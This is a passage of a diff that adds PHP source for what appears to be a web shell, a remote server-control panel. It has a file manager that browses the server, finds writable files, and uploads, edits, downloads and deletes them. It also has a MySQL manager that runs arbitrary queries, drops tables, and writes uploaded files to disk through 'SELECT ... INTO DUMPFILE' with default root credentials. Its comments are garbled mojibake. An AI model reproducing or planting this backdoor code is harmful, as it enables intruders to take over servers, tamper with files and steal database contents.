+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform', 'target'=>'_blank'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+	formhead(array('name'=>'getsize'));
+	makehide('getdir');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
+
+	$cwd_links = '';
+	$path = explode('/', $nowpath);
+	$n=count($path);
+	for($i=0;$i<$n-1;$i++) {
+		$cwd_links .= '<a href="javascript:godir(\'';
+		for($j=0;$j<=$i;$j++) {
+			$cwd_links .= $path[$j].'/';
+		}
+		$cwd_links .= '\');">'.$path[$i].'/</a>';
+	}
+
+?>
+<script type="text/javascript">
+document.onclick = shownav;
+function shownav(e){
+	var src = e?e.target:event.srcElement;
+	do{
+		if(src.id =="jumpto") {
+			$('inputnav').style.display = "";
+			$('pathnav').style.display = "none";
+			//hidenav();
+			return;
+		}
+		if(src.id =="inputnav") {
+			return;
+		}
+		src = src.parentNode;
+	}while(src.parentNode)
+
+	$('inputnav').style.display = "none";
+	$('pathnav').style.display = "";
+}
+</script>
+<div style="background:#eee;margin-bottom:10px;">
+	<table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
+		<tr>
+			<td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
+			<td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
+		</tr>
+	</table>
+	<table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
+	<form action="" method="post" id="godir" name="godir">
+		<tr>
+			<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+			<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
+			<td nowrap><input class="bt" value="GO" type="submit"></td>
+		</tr>
+	</form>
+	</table>
+<?php
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj) && $obj->Drives) {
+			echo '<div class="drives">';
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			$comma = '';
+			foreach($obj->Drives as $drive) {
+				if ($drive->Path) {
+					p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+					$comma = '<span>|</span>';
+				}
+			}
+			echo '</div>';
+		}
+	}
+?>
+</div>
+<?php
+	$findstr = $_POST['findstr'];
+	$re = $_POST['re'];
+	tbhead();
+	p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+
+	p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//²é¿´ËùÓпÉдÎļþºÍĿ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable == 'dir') {
+		$dirdata = GetWDirList($nowpath);
+		$filedata = array();
+	} elseif ($view_writable == 'file') {
+		$dirdata = array();
+		$filedata = GetWFileList($nowpath);
+	} elseif ($findstr) {
+		$dirdata = array();
+		$filedata = GetSFileList($nowpath, $findstr, $re);
+	} else {
+		// Ŀ¼Áбí
+		//scandir()ЧÂʸü¸ß
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			if($getdir && $getdir == $dirdb['server_link']) {
+				$attachsize = dirsize($dirdb['server_link']);
+				$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+			} else {
+				$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
+			}
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
+			p('<td nowrap>'.$attachsize.'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	$file_i = '0';
+
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
+			p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
+			p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'mysqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				foreach($table as $k => $v) {
+					if ($v) {
+						sqldumptable($v, $fp);
+					}
+				}
+				fclose($fp);				
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','mysqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	//²Ù×÷¼Ç¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','mysqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//Ñ¡¶¨Êý¾Ý¿â
+	formhead(array('name'=>'setdbname'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//Ñ¡¶¨±í
+	formhead(array('name'=>'settable'));
+	makehide('action','mysqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//»ñÈ¡Êý¾Ý¿â
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','mysqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW FULL COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<h3>Structure</h3>');
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Collation</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('<td>Privileges</td>');
+					p('<td>Comment</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Collation'].'&nbsp;</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('<td>'.$row['Privileges'].'&nbsp;</td>');
+						p('<td>'.$row['Comment'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+					$result = q("SHOW INDEX FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<h3>Indexes</h3>');
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Keyname</td>');
+					p('<td>Type</td>');
+					p('<td>Unique</td>');
+					p('<td>Packed</td>');
+					p('<td>Seq_in_index</td>');
+					p('<td>Field</td>');
+					p('<td>Cardinality</td>');
+					p('<td>Collation</td>');
+					p('<td>Null</td>');
+					p('<td>Comment</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Key_name'].'</td>');
+						p('<td>'.$row['Index_type'].'</td>');
+						p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
+						p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
+						p('<td>'.$row['Seq_in_index'].'</td>');
+						p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
+						p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
+						p('<td>'.$row['Collation'].'&nbsp;</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Comment'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','mysqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
+						} else {							
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+						}
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+
+									/*********************/
+									$getfield = q("SHOW COLUMNS FROM $tablename");
+									$rowdb = array();
+									$keyfied = ''; //Ö÷¼ü×Ö¶Î
+									while($row = @mysql_fetch_assoc($getfield)) {
+										$rowdb[$row['Field']]['Key'] = $row['Key'];
+										$rowdb[$row['Field']]['Extra'] = $row['Extra'];
+										if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
+											$keyfied = $row['Field'];
+										}
+									}
+									/*********************/								
+									//Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
+									if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
+										$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
+									}
+
+									$result = q($query);
+
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										//Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												//²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
+												if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
+													$where = $key."='".addslashes($inside)."'";
+													break;
+												}
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+										}
+										//¶ÁÈ¡¼Ç¼ÓÃ
+										foreach($mn as $key=>$inside){
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									tbfoot();
+									p($multipage);
+									break;
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
